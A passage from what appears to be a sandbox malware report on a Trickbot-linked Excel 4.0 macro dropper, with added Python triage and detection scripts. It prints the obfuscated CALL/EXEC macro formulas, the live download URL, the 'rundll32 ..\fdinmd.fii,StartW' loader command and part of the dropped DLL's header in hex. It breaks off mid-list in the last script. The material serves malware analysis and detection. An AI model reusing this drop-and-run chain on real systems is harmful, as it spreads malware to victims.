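As an added example, not part of the Joe Sandbox report, the following Python script triages a flattened XLM dump of the kind shown above: it splits rows into cells (honouring quotes and parentheses, since CALL arguments contain commas), splits glued formulas apart, discards the padding formulas, keeps CALL/EXEC/HALT and the jumps into other macro cells, sorts literal cells into URL, drop path and string fragments, and then searches for orderings of the fragments that spell out strings a URLMon drop-and-run chain needs. The sample input is a shortened, constructed copy of this report's dump (most padding removed); the target strings in KNOWN_TARGETS are analyst-supplied guesses, not something the dump states, and the padding and payload function sets are assumptions that a triage tool would keep extending.

```python
"""Triage a flattened Excel 4.0 (XLM) macro dump. Added example, not report code."""
import re
from dataclasses import dataclass, field

SUSPICIOUS_FUNCS = {"CALL", "EXEC", "REGISTER", "RUN", "FORMULA", "HALT", "ALERT"}
DECOY_FUNCS = {"COS", "SIN", "CHAR", "UPPER", "LEN"}   # numeric padding formulas
FORMULA_RE = re.compile(r"^=([A-Za-z0-9_.!$]+)\((.*)\)$", re.S)
# Strings a URLMon/rundll32 drop-and-run chain needs; analyst-supplied, not from the dump.
KNOWN_TARGETS = ("URLMon", "URLDownloadToFileA", "JJCCBB", "rundll32", ",StartW")


@dataclass
class Triage:
    suspicious: list = field(default_factory=list)  # (FUNCTION, raw argument text)
    jumps: list = field(default_factory=list)       # =Sheet!Cell() jumps into other macro cells
    urls: list = field(default_factory=list)
    paths: list = field(default_factory=list)
    fragments: list = field(default_factory=list)   # remaining short literal cells
    decoys_dropped: int = 0


def split_cells(line):
    """Split a flattened row on commas at paren depth 0, honouring quotes."""
    cells, buf, depth, quoted = [], [], 0, False
    for ch in line:
        if ch == '"':
            quoted = not quoted
            continue
        if not quoted and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not quoted and ch == "," and depth == 0:
            cells.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    cells.append("".join(buf).strip())
    return cells


def split_formulas(cell):
    """Dumped cells glue formulas together ('=COS(1)=CALL(...)'); split on '=' at depth 0."""
    pieces, buf, depth = [], [], 0
    for ch in cell:
        if ch == "=" and depth == 0 and buf:
            pieces.append("".join(buf))
            buf = []
        if ch in "()":
            depth += 1 if ch == "(" else -1
        buf.append(ch)
    return pieces + (["".join(buf)] if buf else [])


def triage_dump(dump):
    """Bucket every formula and literal cell of a flattened dump."""
    t = Triage()
    for line in dump.splitlines():
        for piece in (p for cell in split_cells(line) for p in split_formulas(cell)):
            m = FORMULA_RE.match(piece)
            if not m:                                   # literal cell content
                if re.match(r"https?://", piece, re.I):
                    t.urls.append(piece)
                elif "\\" in piece or piece.startswith(".."):
                    t.paths.append(piece)
                else:
                    t.fragments.append(piece)
                continue
            name, args = m.group(1), m.group(2)
            if name.upper() in DECOY_FUNCS and re.fullmatch(r"[0-9.]*", args):
                t.decoys_dropped += 1                   # padding, ignore
            elif "!" in name:
                t.jumps.append(name)
            elif name.upper() in SUSPICIOUS_FUNCS:
                t.suspicious.append((name.upper(), args))
    return t


def build_from_fragments(target, fragments):
    """DFS for an ordered subset of fragments spelling target (each used once); None if impossible."""
    def dfs(rest, avail):
        if not rest:
            return []
        for i, frag in enumerate(avail):
            if frag and rest.startswith(frag):
                tail = dfs(rest[len(frag):], avail[:i] + avail[i + 1:])
                if tail is not None:
                    return [frag] + tail
        return None
    return dfs(target, list(fragments))


# Constructed sample: the formulas and literal cells of the dump above, most padding removed.
SAMPLE_DUMP = (
    '"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)'
    '=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,'
    'Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,'
    'Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)'
    '=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()"\n'
    ',,,=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19'
    '&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=Docs3!BA22(),,,\n'
    ',,http://living-traditions.com/blogs/click.php,,..\\fdinmd.fii,,=HALT(),,'
    'RL,,U,,UR,,JJC,,CBB,,nload,,Mo,,LDow,,n,,ToFil,,r,,eA,,u,,",St",,a,,rt,,ndl,,W,,l32 \n'
)

if __name__ == "__main__":
    t = triage_dump(SAMPLE_DUMP)
    print(f"{t.decoys_dropped} padding formulas dropped; jumps {t.jumps}")
    for name, args in t.suspicious:
        print(f"{name}({args})")
    print("urls:", t.urls, "paths:", t.paths)
    for tgt in KNOWN_TARGETS:
        print(f"{tgt!r:22} <- {build_from_fragments(tgt, t.fragments)}")
```

The fragment search is a plain backtracking search and is only meant for the handful of fragments a sheet like this scatters; it confirms that a dump can spell a suspicious string without knowing the cell addresses, which is exactly what a flattened report loses. When the dump comes from a tool that preserves cell coordinates, resolve the CALL and EXEC references directly instead.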

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            Timestamp                               Src port  Dst port  Source IP      Dest IP
                            Apr 12, 2021 17:06:02.567907095 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.698780060 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.698952913 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.699388027 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.829914093 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888154984 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888185978 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888209105 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888232946 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888254881 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888258934 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888276100 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888279915 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888286114 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888300896 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888308048 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888324976 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888334990 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888350010 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888351917 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888376951 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:02.888387918 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.888410091 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:02.892734051 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019260883 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019337893 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019397020 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019450903 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019454956 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019486904 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019503117 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019509077 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019560099 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019568920 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019769907 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019773006 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019818068 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019830942 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019881964 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019882917 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019932985 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.019933939 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019979000 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.019983053 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.020030975 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.020031929 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.020078897 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.020081997 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.020129919 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.020133018 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.020179987 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.020183086 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.020230055 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.021414995 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151037931 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151130915 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151190996 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151252031 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151314020 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151315928 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151334047 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151384115 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151417971 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151444912 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151499987 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151503086 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151504993 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151562929 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151592970 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151622057 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151678085 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151679993 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151684046 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151738882 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151772976 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151808023 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151871920 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151876926 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151878119 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151936054 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.151964903 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.151994944 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152051926 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152054071 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152057886 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152112007 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152141094 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152170897 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152226925 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152228117 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152230978 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152295113 CEST    80        49165     64.207.186.30  192.168.2.22
                            Apr 12, 2021 17:06:03.152333975 CEST    49165     80        192.168.2.22   64.207.186.30
                            Apr 12, 2021 17:06:03.152365923 CEST    80        49165     64.207.186.30  192.168.2.22

                            UDP Packets

                            Timestamp                               Src port  Dst port  Source IP      Dest IP
                            Apr 12, 2021 17:06:02.484072924 CEST    52197     53        192.168.2.22   8.8.8.8
                            Apr 12, 2021 17:06:02.546745062 CEST    53        52197     8.8.8.8        192.168.2.22

                            DNS Queries

                            Timestamp                               Source IP     Dest IP  Trans ID  OP code             Name                   Type            Class
                            Apr 12, 2021 17:06:02.484072924 CEST    192.168.2.22  8.8.8.8  0xed69    Standard query (0)  living-traditions.com  A (IP address)  IN (0x0001)

                            DNS Answers

                            Timestamp                               Source IP  Dest IP       Trans ID  Reply code    Name                   CName  Address        Type            Class
                            Apr 12, 2021 17:06:02.546745062 CEST    8.8.8.8    192.168.2.22  0xed69    No error (0)  living-traditions.com  -      64.207.186.30  A (IP address)  IN (0x0001)

                            HTTP Request Dependency Graph

                            • living-traditions.com

                            HTTP Packets

                            Session ID  Source IP     Source port  Destination IP  Destination port  Process
                            0           192.168.2.22  49165        64.207.186.30   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Timestamp                               kBytes transferred  Direction  Data
                            Apr 12, 2021 17:06:02.699388027 CEST    0                   OUT        GET /blogs/click.php HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: living-traditions.com
                            Connection: Keep-Alive
                            Apr 12, 2021 17:06:02.888154984 CEST    2                   IN         HTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 12 Apr 2021 15:06:02 GMT
                            Content-Type: application/octet-stream
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.3.25
                            Content-Disposition: attachment; filename="4HeVw.perclick"
                            X-Powered-By: PleskLin
                            Data Raw: 31 66 32 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 50 e9 4c 75 31 87 1f 75 31 87 1f 75 31 87 1f 3f 54 82 1e 74 31 87 1f 06 53 86 1e 72 31 87 1f 75 31 86 1f 70 31 87 1f 65 57 82 1e 71 31 87 1f 65 57 87 1e 74 31 87 1f 65 57 85 1e 74 31 87 1f 52 69 63 68 75 31 87 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9a 2b 74 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 0d 00 28 00 00 00 b0 06 00 00 00 00 00 6d 19 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 07 00 00 04 00 00 28 0f 07 00 01 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 40 00 00 44 00 00 00 68 41 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 80 00 00 00 20 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 02 00 00 00 40 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 40 00 00 00 50 00 00 00 42 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 ff 67 06 00 00 a0 00 00 00 68 06 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 10 07 00 00 02 00 00 00 da 06 00 
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 81 ec 28 02 00 00 53 56 be c3 68 13 00 33 db 43 83 3d 1c 90 00 10 00 89 5d d8 66 0f 6e c6 f3 0f
                            Data Ascii: 1f27MZ@!L!This program cannot be run in DOS mode.$1PLu1u1u1?Tt1Sr1u1p1eWq1eWt1eWt1Richu1PEL+t`!(m@ (@@@DhAP @@ .text&( `.rdataD@,@@.data8@PB0@.pdataghr@.reloc@BU(SVh3C=]fn
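The response above declares `application/octet-stream` with `Content-Disposition: attachment; filename="4HeVw.perclick"`, but the chunked body begins `1f27\r\n` (the chunk size) followed by an MZ header, and the bytes at e_lfanew carry a `PE\0\0` signature with Machine 0x014c and the IMAGE_FILE_DLL bit set: a 32-bit PE DLL under a non-executable name, which is the "content does not match file extension" condition. The following is an added example written for this report, not Joe Sandbox output; it de-chunks a captured body, parses the COFF header, and flags the mismatch. The sample bytes are transcribed from the Data Raw dump above and deliberately truncated; the header dictionary and the list of "PE-like" extensions are assumptions made for the example.

```python
"""Classify a downloaded HTTP body by its content rather than by the filename the
server declares. Added example, not Joe Sandbox output."""
import re
import struct
from os.path import splitext

# Constructed sample: the first 242 bytes of the chunked response body shown in this
# report, transcribed from the Data Raw hex dump above ("1f27\r\n" chunk-size line,
# then the start of the downloaded file). The capture is truncated on purpose.
RAW_HEX = " ".join([
    "31 66 32 37 0d 0a",
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00",
    "b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00",
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68",
    "69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f",
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20",
    "6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00",
    "31 50 e9 4c 75 31 87 1f 75 31 87 1f 75 31 87 1f",
    "3f 54 82 1e 74 31 87 1f 06 53 86 1e 72 31 87 1f",
    "75 31 86 1f 70 31 87 1f 65 57 82 1e 71 31 87 1f",
    "65 57 87 1e 74 31 87 1f 65 57 85 1e 74 31 87 1f",
    "52 69 63 68 75 31 87 1f 00 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00",
    "9a 2b 74 60 00 00 00 00 00 00 00 00 e0 00 02 21",
    "0b 01",
])
SAMPLE_BODY = bytes.fromhex(RAW_HEX)
SAMPLE_HEADERS = {  # the captured response headers the classifier consults
    "Content-Type": "application/octet-stream",
    "Transfer-Encoding": "chunked",
    "Content-Disposition": 'attachment; filename="4HeVw.perclick"',
}

IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "armnt", 0xAA64: "arm64"}
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi"}


def dechunk(body: bytes) -> bytes:
    """Undo chunked transfer-encoding; a truncated final chunk is returned as far as it goes."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            break
        try:                                   # size line may carry ";ext" chunk extensions
            size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        except ValueError:
            break
        if size == 0:                          # terminating chunk
            break
        start = eol + 2
        out += body[start:start + size]
        pos = start + size + 2                 # skip the CRLF after the chunk data
    return bytes(out)


def parse_pe_header(data: bytes):
    """Return COFF header fields if `data` begins a PE image, else None. A truncated
    prefix is fine as long as the COFF header itself is present."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsect, stamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if len(data) >= e_lfanew + 26 else None
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsect,
        "timestamp": stamp,                    # TimeDateStamp, seconds since the Unix epoch
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "pe_format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"),
    }


def declared_filename(content_disposition: str) -> str:
    m = re.search(r'filename\*?=\s*"?([^";]+)"?', content_disposition, re.I)
    return m.group(1).strip() if m else ""


def classify_download(headers: dict, body: bytes) -> dict:
    """Compare what the server claims to send with what it actually sent."""
    chunked = headers.get("Transfer-Encoding", "").lower() == "chunked"
    payload = dechunk(body) if chunked else body
    name = declared_filename(headers.get("Content-Disposition", ""))
    ext = splitext(name)[1].lower()
    pe = parse_pe_header(payload)
    result = {"declared_filename": name, "declared_ext": ext,
              "payload_bytes": len(payload), "is_pe": pe is not None}
    if pe:
        result.update(pe)
    # A PE image arriving under a name Windows would not treat as executable is the
    # "content does not match file extension" condition the sandbox reports.
    result["extension_mismatch"] = pe is not None and ext not in PE_EXTENSIONS
    return result
```

Run `classify_download(SAMPLE_HEADERS, SAMPLE_BODY)` and it reports `is_pe`, `is_dll`, `machine == "x86"`, `pe_format == "PE32"`, five sections, and `extension_mismatch == True` for `.perclick`. The same check applied to the dropped `..\fdinmd.fii` gives the same verdict; a proxy or EDR rule that keys on Content-Type or filename alone would have let both through.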


                            Code Manipulations

                            Statistics

                            Behavior

                            System Behavior

                            General

                            Start time: 17:05:35
                            Start date: 12/04/2021
                            Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit): false
                            Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase: 0x13f7e0000
                            File size: 27641504 bytes
                            MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 17:05:40
                            Start date: 12/04/2021
                            Path: C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit): false
                            Commandline: rundll32 ..\fdinmd.fii,StartW
                            Imagebase: 0xff700000
                            File size: 45568 bytes
                            MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 17:05:40
                            Start date: 12/04/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32 ..\fdinmd.fii,StartW
                            Imagebase: 0x940000
                            File size: 44544 bytes
                            MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 17:05:41
                            Start date: 12/04/2021
                            Path: C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline: C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size: 50688 bytes
                            MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: moderate
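The process list above shows the pattern a detection engineer wants to catch from process-creation telemetry alone: an Office process starting rundll32 with a module that has a non-DLL extension (`.fii`), given as a relative `..\` path, with an export name (`StartW`) and then a second, 32-bit rundll32 carrying the same command line. The following is an added detection example written for this report, not Joe Sandbox's own logic. The image paths and command lines are the ones the report shows; the PIDs, the parent links, the explorer.exe row, the benign control row and the Office-image and DLL-extension lists are assumptions made for the example.

```python
"""Flag rundll32 invocations matching the loader pattern in this report's process
list. Added detection example, not Joe Sandbox's own logic."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events modelled on the System Behavior entries above.
# Image paths and command lines are the ones the report shows; PIDs, parent links and
# the explorer.exe and benign rundll32 rows are assumptions made for the example.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1001, 1000, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"),
    ProcEvent(1002, 1001, r"C:\Windows\System32\rundll32.exe", r"rundll32 ..\fdinmd.fii,StartW"),
    ProcEvent(1003, 1002, r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32 ..\fdinmd.fii,StartW"),
    ProcEvent(1004, 1000, r"C:\Windows\System32\rundll32.exe",   # benign control
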